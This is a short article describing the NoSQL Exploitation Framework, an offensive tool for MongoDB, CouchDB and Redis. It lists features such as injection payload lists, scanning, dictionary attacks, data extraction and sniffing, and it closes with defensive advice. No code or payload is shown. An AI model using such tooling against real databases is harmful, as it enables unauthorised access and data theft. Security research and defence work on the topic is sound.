NoSQL Exploitation Framework – Tool of the Month
NoSQL Exploitation Framework – A Tool for Script kiddies to Learn NOSQL – SQLInjection
NoSQL, which stands for Not Only SQL, is
a common term for nonrelational databases. Among popular NoSQL
databases you will find the aforementioned MongoDB and CouchDB, along
with Redis, Cassandra and more. NoSQL databases have become increasingly
popular thanks to their benefits in particular use cases, especially in
big data and real-time Web usages where performance, scalability and
flexibility are key. NoSQL Exploitation Framework
NoSQL databases
are vulnerable to injection attack. Here is an example of equivalent
attack , where attacker manages to retrieve admin user’s record without
knowing password:
Author: Francis Alexander 9630 The URL: https://github.com/torque59/nosql-exploitation-framework System:Linux and WindowsRecently added to the innovation project:
- Support Mongo, Couch, Redis, H-Base, Cassandra;
- support NoSQL WebApps;
- List payload for JS-injection, transfer of web applications;
- opportunity skanirovaniya Mongo, Couch and Redis;
- the possibility of dictionary attacks on Mongo, Couch and Redis;
- transferring module for database to obtain data;
- detection of web-based interface for Mongo;
- Shodan support request;
- multi-threaded scanner IP-addresses from the list;
- sniffing for Mongo, Couch and Redis.
How Do I Prevent It?
Here are some measures to prevent SQL / NoSQL injection attacks, or minimize impact if it happens:
- Prepared Statements: For SQL calls, use prepared statements instead of building dynamic queries using string concatenation.
- Input Validation: Validate inputs to detect malicious values. For NoSQL databases, also validate input types against expected types
- Least Privilege: To minimize the potential damage of a successful injection attack, do not assign DBA or admin type access rights to your application accounts. Similarly minimize the privileges of the operating system account that the database process runs under.